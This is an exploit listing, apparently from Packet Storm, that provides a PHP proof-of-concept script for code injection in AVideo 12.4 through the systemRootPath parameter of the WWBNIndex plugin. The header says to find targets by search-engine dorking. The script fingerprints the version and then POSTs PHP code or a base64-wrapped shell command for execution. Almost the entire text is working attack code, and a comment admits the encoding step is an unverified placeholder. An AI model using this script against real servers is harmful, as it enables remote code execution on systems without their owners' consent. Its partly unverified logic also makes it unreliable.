## https://sploitus.com/exploit?id=PACKETSTORM:181979
=============================================================================================================================================  
| # Title : AVideo 12.4 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://github.com/WWBN/AVideo/tree/master |  
=============================================================================================================================================  
  
POC :  
  
[+] Locate candidate targets by dorking in Google or another search engine.  
  
[+] The following PHP code POSTs the payload in the `systemRootPath` parameter to `/plugin/WWBNIndex/submitIndex.php`; it does not fetch a shell from an external link.  
  
[+] Set `$target_uri` (in the example-usage section near the end of the script) to your target base URL.  
  
[+] Set `$payload` (the line after `$target_uri`) to the payload to inject.  
  
[+] Save the code as poc.php.  
  
[+] Usage: `php poc.php`  
  
[+] PayLoad :  
  
<?php  
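class indoushka
{
    /** Base URL of the target, e.g. "http://host:port" (a trailing slash is stripped). */
    private $target_uri;
    /** Either a shell command, or PHP source that begins with an opening "<?php" tag. */
    private $payload;

    /**
     * @param string $target_uri base URL of the AVideo instance
     * @param string $payload    shell command, or PHP source beginning with "<?php"
     */
    public function __construct($target_uri, $payload)
    {
        // Strip a trailing slash so "$target_uri . '/path'" never yields "//path".
        $this->target_uri = rtrim((string) $target_uri, '/');
        $this->payload = (string) $payload;
    }

    /**
     * Sends the injection request: the prepared PHP source is POSTed as the
     * "systemRootPath" parameter of /plugin/WWBNIndex/submitIndex.php.
     *
     * Prints a one-line status and returns the raw response array so the
     * caller can inspect the body itself.
     *
     * @return array{code:int, body:string|false, error:string}
     */
    public function exploit()
    {
        $php_code = $this->buildPhpCode();
        $filter_payload = $this->generatePhpFilterPayload($php_code);

        $data = http_build_query(['systemRootPath' => $filter_payload]);
        $response = $this->sendRequest('POST', '/plugin/WWBNIndex/submitIndex.php', $data);

        if ($response['body'] === false) {
            // cURL failure or timeout. A payload that blocks (e.g. a reverse shell)
            // also lands here, so this is not necessarily a failed attempt.
            echo "No HTTP response from the target (cURL: " . $response['error'] . ").\n";
        } elseif ($response['code'] !== 200) {
            echo "Server returned " . $response['code'] . ".\n";
        } else {
            echo "Server returned 200; inspect the response body, a 200 alone does not prove execution.\n";
        }

        return $response;
    }

    /**
     * Fingerprints the target: fetches /index.php, extracts the AVideo version,
     * probes for the WWBNIndex plugin endpoint and compares the version with
     * the 12.4 .. 14.2 range this PoC targets.
     *
     * @return string human-readable verdict
     */
    public function check()
    {
        $response = $this->sendRequest('GET', '/index.php');
        // sendRequest() always returns an array; a transport failure is signalled by body === false.
        if ($response['body'] === false) {
            return 'Failed to connect to the target.';
        }

        if ($response['code'] !== 200) {
            return "Unexpected HTTP response code: " . $response['code'];
        }

        $version = $this->extractVersion($response['body']);
        if ($version === null) {
            return 'Unable to extract AVideo version.';
        }

        $plugin_check = $this->sendRequest('GET', '/plugin/WWBNIndex/submitIndex.php');
        if ($plugin_check['code'] !== 200) {
            return 'Vulnerable plugin WWBNIndex was not detected';
        }

        if (version_compare($version, '12.4', '>=') && version_compare($version, '14.2', '<=')) {
            return "Detected vulnerable AVideo version: {$version}, with vulnerable plugin WWBNIndex running.";
        }

        return "Detected non-vulnerable AVideo version: {$version}";
    }

    /**
     * Pulls the AVideo version out of the index page HTML.
     *
     * The two markers are tried in order; the first one that matches wins.
     * (The original ran both preg_match() calls into the same array, so a
     * miss on the second marker discarded a hit on the first.)
     *
     * @param string $html response body of /index.php
     * @return string|null version string such as "12.4", or null when neither marker matches
     */
    private function extractVersion($html)
    {
        $markers = [
            '/Powered by AVideo ® Platform v([\d.]+)/',
            '/<!--.*?v:([\d.]+).*?-->/m',
        ];

        foreach ($markers as $pattern) {
            if (preg_match($pattern, $html, $m) === 1 && $m[1] !== '') {
                return $m[1];
            }
        }

        return null;
    }

    /**
     * Issues one HTTP request against the target.
     *
     * @param string      $method HTTP method ('GET', 'POST', ...)
     * @param string      $uri    path relative to $target_uri, starting with '/'
     * @param string|null $data   urlencoded body, only used for POST
     * @return array{code:int, body:string|false, error:string}
     *         body is false and error is non-empty when cURL could not complete the request
     */
    private function sendRequest($method, $uri, $data = null)
    {
        $ch = curl_init($this->target_uri . $uri);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            // Bounded so an unreachable host or a blocking payload cannot hang the PoC forever.
            CURLOPT_CONNECTTIMEOUT => 10,
            CURLOPT_TIMEOUT        => 30,
        ]);

        if ($method === 'POST') {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        } else {
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        }

        $body = curl_exec($ch);
        $http_code = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $error = curl_error($ch);
        curl_close($ch);

        return ['code' => $http_code, 'body' => $body, 'error' => $error];
    }

    /**
     * Builds the PHP source to inject from $payload.
     *
     * - PHP source (see isArchPHP()) is used as-is, after removing any
     *   "<?php" / "?>" tags the operator included, so the tags are never doubled.
     * - Anything else is treated as a shell command and wrapped in
     *   system(base64_decode(...)) so quoting inside the command cannot break
     *   the generated PHP.
     *
     * @return string complete "<?php ... ?>" snippet
     */
    private function buildPhpCode()
    {
        if ($this->isArchPHP()) {
            $body = preg_replace(['/^\s*<\?php\b\s*/i', '/\s*\?>\s*$/'], '', $this->payload);
            return '<?php ' . trim($body) . ' ?>';
        }

        return "<?php system(base64_decode('" . base64_encode($this->payload) . "')); ?>";
    }

    /**
     * True when $payload is already PHP source, i.e. it starts with an opening
     * "<?php" tag (leading whitespace allowed). Everything else is treated as a
     * shell command by buildPhpCode().
     *
     * @return bool
     */
    private function isArchPHP()
    {
        return preg_match('/^\s*<\?php\b/i', $this->payload) === 1;
    }

    /**
     * Hook for encoding the PHP source into the form the vulnerable endpoint
     * expects. This is a placeholder: it returns $php_code unchanged, so the
     * value actually POSTed is literal PHP source.
     *
     * NOTE(review): the parameter name "systemRootPath" suggests the server
     * consumes it as a filesystem/include path rather than evaluating it as
     * source; if that is the case a raw PHP string is unlikely to be usable
     * as-is, and this is the place to substitute a php://filter based encoding
     * of $php_code. Not verified against the vendor code here.
     *
     * @param string $php_code output of buildPhpCode()
     * @return string value to send as systemRootPath
     */
    private function generatePhpFilterPayload($php_code)
    {
        return $php_code;
    }
}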
  
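// Example usage: php poc.php [target_uri] [payload]
// Falls back to the values below when no arguments are given.
$target_uri = $argv[1] ?? "http://target-url.com"; // target base URL, e.g. http://host:port
$payload = $argv[2] ?? "<?php echo 'Hello World!'; ?>"; // payload to inject

// Refuse to fire at the placeholder host: it may resolve to a third party that
// does not belong to the operator.
if ($target_uri === "http://target-url.com") {
    fwrite(STDERR, "Usage: php poc.php <target_uri> [payload]  (or edit \$target_uri in this file)\n");
    exit(1);
}

$indoushka = new indoushka($target_uri, $payload);
$check_result = $indoushka->check();
echo $check_result . "\n";
// exploit() is sent regardless of the check() verdict, as in the original PoC;
// the fingerprint can miss on customised front pages.
$indoushka->exploit();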
?>  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================